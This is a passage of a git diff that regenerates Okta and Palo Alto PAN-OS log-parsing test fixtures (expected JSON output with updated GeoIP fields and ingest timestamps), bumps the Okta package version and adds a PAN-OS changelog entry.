Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -256,36 +243,12 @@ "name": "Mac" }, "version": "72.0." - } - }, - { - "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JL", - "country_name": "China", - "region_name": "Jilin", - "location": { - "lon": 125.3228, - "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, - "user": { - "full_name": "xxxxxx", - "id": "00u1abvz4pYqdM8ms4x6" - }, - "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-02-14T22:18:51.843Z", "ecs": { "version": "1.12.0" @@ -314,8 +277,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417355900Z", + "ingested": "2021-12-14T14:49:51.612968038Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -385,7 +367,10 @@ "name": "Mac" }, "version": "72.0." - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index a30e8f399b2..e5e007749e8 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,6 +1,6 @@ name: okta title: Okta Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect and parse event logs from Okta API with Elastic Agent. type: integration diff --git a/packages/panw/changelog.yml b/packages/panw/changelog.yml index deb834ec225..acfd13f285c 100644 --- a/packages/panw/changelog.yml +++ b/packages/panw/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json index b8d4ac9e903..16c8c057868 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json @@ -12,7 +12,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366911400Z", + "ingested": "2021-12-14T14:49:54.397819335Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,CONFIG,0,0,2012/02/25 00:51:50,192.168.0.2,,set,admin,Web,Succeeded, config shared local-user-database user badguy,0,0x0", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -41,7 +41,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366915600Z", + "ingested": "2021-12-14T14:49:54.397821530Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:22,192.168.0.2,,set,admin,Web,Succeeded, config mgt-config users badguy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -70,7 +70,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366922Z", + "ingested": "2021-12-14T14:49:54.397821980Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:53:40,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -99,7 +99,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366928400Z", + "ingested": "2021-12-14T14:49:54.397822363Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:53:53,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -128,7 +128,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366932800Z", + "ingested": "2021-12-14T14:49:54.397822703Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:53:56,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -157,7 +157,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366937100Z", + "ingested": "2021-12-14T14:49:54.397823048Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:54:16,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -186,7 +186,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366942Z", + "ingested": "2021-12-14T14:49:54.397823392Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,ras,0,2012/02/25 00:54:16,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -215,7 +215,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366946400Z", + "ingested": "2021-12-14T14:49:54.397823739Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:17,192.168.0.2,,edit,badguy,Web,Succeeded, vsys vsys1 profiles url-filtering monzyspolicy,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -244,7 +244,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366950100Z", + "ingested": "2021-12-14T14:49:54.397824082Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,CONFIG,0,0,2012/02/25 00:57:36,192.168.0.2,,commit,badguy,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -273,7 +273,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366955Z", + "ingested": "2021-12-14T14:49:54.397824435Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,routing,0,2012/02/25 00:57:49,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -302,7 +302,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366959500Z", + "ingested": "2021-12-14T14:49:54.397824780Z", "original": "Mar 25 23:59:02 1,2013/03/25 23:59:02,1606001116,SYSTEM,vpn,0,2012/02/25 00:57:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:02.000-04:00", "timezone": "America/New_York", @@ -331,7 +331,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366964400Z", + "ingested": "2021-12-14T14:49:54.397825317Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,routing,0,2012/02/25 00:58:12,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -360,7 +360,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366968300Z", + "ingested": "2021-12-14T14:49:54.397825685Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,vpn,0,2012/02/25 00:58:12,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -389,7 +389,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366973100Z", + "ingested": "2021-12-14T14:49:54.397826060Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,ras,0,2012/02/25 00:58:12,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -418,7 +418,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366979100Z", + "ingested": "2021-12-14T14:49:54.397826426Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,1,2012/02/25 00:58:14,,unknown,,0,0,general,informational,Config installed,909,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -447,7 +447,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366986600Z", + "ingested": "2021-12-14T14:49:54.397826765Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,1606001116,SYSTEM,general,0,2012/02/25 00:59:36,,general,,0,0,general,informational,Log type config cleared by user badguy ,0,0x0", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", @@ -476,7 +476,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366992800Z", + "ingested": "2021-12-14T14:49:54.397827234Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,general,1,2012/04/10 03:11:57,,unknown,,0,0,general,informational,Config installed,884,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -505,7 +505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.366998700Z", + "ingested": "2021-12-14T14:49:54.397827586Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:11:56,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -534,7 +534,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367003500Z", + "ingested": "2021-12-14T14:49:54.397827927Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,vpn,0,2012/04/10 03:11:56,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -563,7 +563,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367008400Z", + "ingested": "2021-12-14T14:49:54.397828280Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,routing,0,2012/04/10 03:11:56,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -592,7 +592,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367014400Z", + "ingested": "2021-12-14T14:49:54.397828626Z", "original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,SYSTEM,ras,0,2012/04/10 03:06:11,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:22.000-04:00", "timezone": "America/New_York", @@ -621,7 +621,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367018900Z", + "ingested": "2021-12-14T14:49:54.397828977Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/10 03:06:00,,routed-config-p1-success,,0,0,general,informational,Route daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -650,7 +650,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367023800Z", + "ingested": "2021-12-14T14:49:54.397829341Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,general,1,2012/04/09 09:02:53,,unknown,,0,0,general,informational,Config installed,840,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -679,7 +679,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367029900Z", + "ingested": "2021-12-14T14:49:54.397829795Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:02:52,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -708,7 +708,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367034600Z", + "ingested": "2021-12-14T14:49:54.397830152Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:02:52,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -737,7 +737,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367039600Z", + "ingested": "2021-12-14T14:49:54.397830503Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,routing,0,2012/04/09 09:02:52,,routed-config-p2-success,,0,0,general,informational,Route daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -766,7 +766,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367044500Z", + "ingested": "2021-12-14T14:49:54.397830848Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,ras,0,2012/04/09 09:00:55,,rasmgr-config-p1-success,,0,0,general,informational,RASMGR daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -795,7 +795,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367050400Z", + "ingested": "2021-12-14T14:49:54.397831212Z", "original": "Mar 25 23:59:27 1,2013/03/25 23:59:27,01606001116,SYSTEM,vpn,0,2012/04/09 09:00:52,,ike-config-p1-success,,0,0,general,informational,IKE daemon configuration load phase-1 succeeded.,0,0x0", "created": "2013-03-25T23:59:27.000-04:00", "timezone": "America/New_York", @@ -824,7 +824,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367054600Z", + "ingested": "2021-12-14T14:49:54.397831563Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:35,192.168.0.2,,commit,admin,Web,Submitted,,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -853,7 +853,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367059600Z", + "ingested": "2021-12-14T14:49:54.397831909Z", "original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20,192.168.0.2,,edit,admin,Web,Succeeded, vsys vsys1 profiles data-objects PII,0,0x0", "created": "2013-03-25T23:59:32.000-04:00", "timezone": "America/New_York", @@ -882,7 +882,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367065600Z", + "ingested": "2021-12-14T14:49:54.397832256Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -911,7 +911,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367070500Z", + "ingested": "2021-12-14T14:49:54.397832600Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", @@ -940,7 +940,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:42:57.367076200Z", + "ingested": "2021-12-14T14:49:54.397832941Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 